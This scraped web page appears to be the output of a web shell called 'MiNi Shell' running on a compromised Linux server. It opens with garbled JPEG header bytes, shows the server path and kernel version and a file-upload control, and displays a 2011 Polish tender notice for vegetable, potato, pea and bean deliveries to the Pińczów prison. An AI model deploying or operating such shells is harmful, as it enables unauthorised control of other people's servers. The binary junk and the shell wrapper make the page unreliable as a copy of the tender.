JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111117/300535-N-2011.html

<p class="kh_header"><b>Pińczów: DOSTAWY  WARZYW, ZIEMNIAKÓW, GROCHU I FASOLI      DO   ZAKŁADU KARNEGO W PIŃCZOWIE</b><br>
<b>Numer ogłoszenia: 300535 - 2011; data zamieszczenia: 17.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Pińczowie , ul. 3-go  Maja 34, 28-400 Pińczów, woj. świętokrzyskie, tel. 041 3577372, faks 041 3577373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY  WARZYW, ZIEMNIAKÓW, GROCHU I FASOLI      DO   ZAKŁADU KARNEGO W PIŃCZOWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A zamówienia:  
Przedmiotem zamówienia są sukcesywne  dostawy  loco  magazyn Zakładu Karnego w Pińczowie  ul. 3-go Maja 34, 28-400 Pińczów n/w warzyw jadalnych w n/w łącznych rocznych  ilościach:
-	seler korzeniowy 7 800kg - kod CPV: 03221120-3,Norma: PN-R-75371:1996,   minimalna średnica 5cm, świeże, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysty.   Pakowane w worki do 50kg.
-	por  7 600kg - kod CPV: 03221110-0, Norma: PN-R-75521:1996, świeży, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysty.  Pakowane w worki do 50kg..     
-	pietruszka korzeń 10 000kg -  kod CPV: : 03221000-6, Norma: PN-R-75370:1996, świeże, minimalna średnica 2cm - minimalna długość12cm, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta. Pakowane w worki do 50kg.
-	marchewka korzeń 29 000kg - kod CPV: 03221112-4 , Norma: PN-84/R-75358, świeże,  minimalna średnica 2cm,  minimalna długość12cm,bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta. Pakowane w worki do 50kg. 
-	kapusta biała 22 000kg - kod CPV: 03221410-3, Norma: PN-72/R-75362, świeże, minimalna waga 1szt - 1kg,bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta. Pakowane w worki do 50kg.
-	cebula 30 000kg -kod CPV: 03221113-1, Norma: PN-87/R-75357, świeże, minimalna średnica 4cm,bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta. Pakowane w worki do 50kg.
-	buraki czerwone 19 000kg - kod CPV: 03221113-1 , Norma: PN-72/R-75360, świeże,  minimalna średnica 5cm,bez uszkodzeń powodujących obniżenie wartości użytkowej, czyste. Pakowane w worki do 50kg.
-	jabłka konsumpcyjne 21 000kg, kod CPV: 03222321-9, Norma: PN-84/R/-75024, świeże, dojrzałe, jednoodmianowe, bez uszkodzeń powodujących obniżenie wartości użytkowej, czyste.  Pakowane w paczki do 30kg.
Część B zamówienia:    
Przedmiotem zamówienia są sukcesywne       dostawy  loco      magazyn Zakładu    Karnego w      Pińczowie  ul. 3-go Maja 34, 28-400 Pińczów n/w ziemniaków jadalnych i w   rocznej ilości: ziemniak jadalny   168 000kg - kod CPV: 03212100-1 , Norma: PN-75/R-74450 średnica ziemniaka minimum 5 cm,  o świeżym wyglądzie, właściwym kształcie, zapachu, bez zanieczyszczeń,  w workach do 50kg . 
Część C zamówienia:  
Przedmiotem zamówienia są sukcesywne  dostawy  loco  magazyn Zakładu Karnego w Pińczowie  ul. 3-go Maja 34, 28-400 Pińczów n/w produktów w n/w łącznych rocznych  ilościach:
-	groch łuskany 2000kg, kod CPV: 03221220-4, Norma: PN-81/R-65032, jednoodmianowy, o świeżym wyglądzie, właściwym kształcie, zapachu, bez zanieczyszczeń. Pakowane w worki do 50kg.
-	fasola Typu Jaś 3000kg, kod CPV: 03221210-1, Norma: PN-81/R-65031, jednoodmianowy, o świeżym wyglądzie, właściwym kształcie, zapachu, bez zanieczyszczeń.  Pakowane w worki do 50kg..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: część A zamówienia:   4 000,00zł, część B zamówienia: 3600,00zł, część C zamówienia: 450,00zł,   winno być wniesione przed terminem składania ofert (winno znaleźć się  na rachunku zamawiającego)  do dnia 25.11.2011r.  do godz. 09.00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Opis warunków udziału w postępowaniu i opis sposobu dokonywania oceny  spełniania tych warunków.
1). O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią nww warunki dotyczące:   (art.22 ust.1 ustawy):
1). Posiadania  uprawnień do wykonywania  określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania;
2). Posiadania wiedzy i  doświadczenia; 
3). Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4). Sytuacji ekonomicznej i finansowej.
Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1  ustawy.      
2). Zaoferują realizację pełnego asortymentu składającego się na całość lub wybraną do realizacji część  zamówienia. 
3). Spełnią wszystkie wymagania wynikające z oświadczeń i dokumentów      zawartych          w  niniejszej  SIWZ.
4). Złożą wszystkie dokumenty i oświadczenia wyszczególnione w SIWZ. 
5).	Utrzymają stałe ceny podane w Formularzu Ofertowym przez okres 12 miesięcy licząc od daty podpisania umowy. 
7). Wniosą  w terminie wymagane wadium. 
Oferty zostaną sprawdzone czy zostały sporządzone zgodnie z przepisami ustawowymi 
i postanowieniami specyfikacji istotnych warunków zamówienia, a następnie ocenione zgodnie z kryteriami i warunkami zawartymi w specyfikacji istotnych warunków zamówienia na zasadzie: wykazał -  nie wykazał. Nie  spełnienie  chociażby  jednego  z w/w  warunków  skutkować  będzie  wykluczeniem  wykonawcy z postępowania      o udzielnie zamówienia. Spełnienie warunków udziału w postępowaniu będzie oceniane na podstawie  oświadczeń i dokumentów złożonych z ofertą (wykazał- nie wykazał). 
Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (np. konsorcjum, spółka cywilna)
W przypadku, gdy Wykonawcy ubiegają się wspólnie o udzielenie zamówienia, ich oferta musi spełniać następujące wymagania:
1.	Wykonawcy muszą dołączyć do oferty pełnomocnictwo, podpisane przez upoważnionych przedstawicieli wszystkich pozostałych Wykonawców;
2.	Wszelka korespondencja oraz rozliczenia dokonywane będą z Wykonawcą wskazanym i upoważnionym w pełnomocnictwie przez pozostałych Wykonawców;
3.	Oferta musi być podpisana w taki sposób, aby skutecznie zobowiązywała wszystkich Wykonawców występujących wspólnie;
4.	Każdy z Wykonawców odrębnie ma obowiązek złożyć oświadczenia o spełnianiu wymagań określonych w art. 22 ust. 1 i art. 24 ust. 1 ustawy   Prawo zamówień publicznych - załącznik nr 1 i 2; 
5.	Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę, w miejscu np. nazwa i adres Wykonawcy  należy wpisać dane dotyczące Wykonawców ubiegających się wspólnie o udzielenie zamówienia, a nie dane pełnomocnika.
VIII. Wykaz   oświadczeń i dokumentów  jakie mają dostarczyć Wykonawcy z ofertą w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
1.) W zakresie wykazania spełnienia przez wykonawcę warunków, o których mowa w art.22 ust.1 ustawy,  należy złożyć - Oświadczenia- zał. nr 1 do SIWZ   o spełnieniu warunków udziału w postępowaniu. 
2). W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust.1,2   ustawy należy złożyć -  Oświadczenie o braku podstaw do wykluczenia - zał. nr 2 do SIWZ           
3 Formularz Ofertowy stanowiący załącznik nr 3 do niniejszej SIWZ.
5). W przypadku wniesienia wadium w formie gwarancji ubezpieczeniowej lub bankowej należy załączyć do oferty oryginał  odpowiedniego dokumentu.   
Uwaga: Dokumenty i oświadczenia winny być podpisane przez osobę upoważnioną do reprezentowania Wykonawcy i podpisania oferty   i przedstawione w formie oryginału sporządzonej wg  wzoru przedmiotowych załączników.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia nieodpłatnie  na pisemny wniosek zainteresowanego  można odebrać w siedzibie Zamawiającego, lok. 20 lub ściągnąć ze  strony internetowej www.sw.gov.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2011 godzina 08:30, miejsce: Oferty należy składać w siedzibie Zamawiającego -  sekretariat Zakładu Karnego                    w   Pińczowie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część A zamówienia:
-	buraki czerwone 19 000kg - kod CPV: 03221110-0 , Norma: PN-72/R-75360, świeże,  minimalna średnica 5cm,bez uszkodzeń powodujących obniżenie wartości użytkowej, czyste. Pakowane w worki do 50kg.
-	cebula 30 000kg -kod CPV: 03221000-6, Norma: PN-87/R-75357, świeże, minimalna średnica 4cm,bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta. Pakowane w worki do 50kg.
-	jabłka konsumpcyjne 21 000kg, kod CPV: 03222321-9, Norma: PN-84/R/-75024, świeże, dojrzałe, jednoodmianowe, bez uszkodzeń powodujących obniżenie wartości użytkowej, czyste, pakowane w paczki do 30kg, 
-	kapusta biała 22 000kg - kod CPV: 03221400-0, Norma: PN-72/R-75362, świeże, minimalna waga 1szt-1kg,bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta. Pakowane w worki do 50kg.
-	marchewka 29 000kg - kod CPV: 0322100-7, Norma: PN-84/R-75358, świeże,  minimalna średnica 2cm,  minimalna długość12cm,bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta. Pakowane w worki do 50kg.
-	Pietruszka-korzeń  10 000kg -  kod CPV: 03221100-7 , Norma: PN-R-75370:1996, świeże, minimalna średnica 2cm - minimalna długość12cm, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta. Pakowane w worki do 50kg.
-	por 7 600kg - kod CPV: 03221110-0, Norma: PN-R-75521:1996, świeży, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysty.  Pakowane w worki do 50kg.   
-	seler korzeniowy 7 800kg - kod CPV: 03221100-7,Norma: PN-R-75371:1996,   minimalna średnica 5cm, świeże, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysty.  Pakowane w worki do 50kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część B zamówienia:
-   ziemniak jadalny   roczna ilość 168 000kg - kod CPV: 03212100-1, Norma: PN-75/R-74450 średnica ziemniaka minimum 5cm,  o świeżym wyglądzie, właściwym kształcie, zapachu, bez zanieczyszczeń,  w workach do 50kg ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> groch i fasola.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część C zamówienia:
- groch łuskany 2000kg, kod CPV: 03212100-1, Norma: PN-81/R-65032, jednoodmianowy,   o świeżym wyglądzie, właściwym kształcie, zapachu, bez zanieczyszczeń.
- fasola Typu Jaś 3000kg, kod CPV: 03221210-1, Norma: PN-81/R-65031, jednoodmianowy, o świeżym wyglądzie, właściwym kształcie, zapachu, bez zanieczyszczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com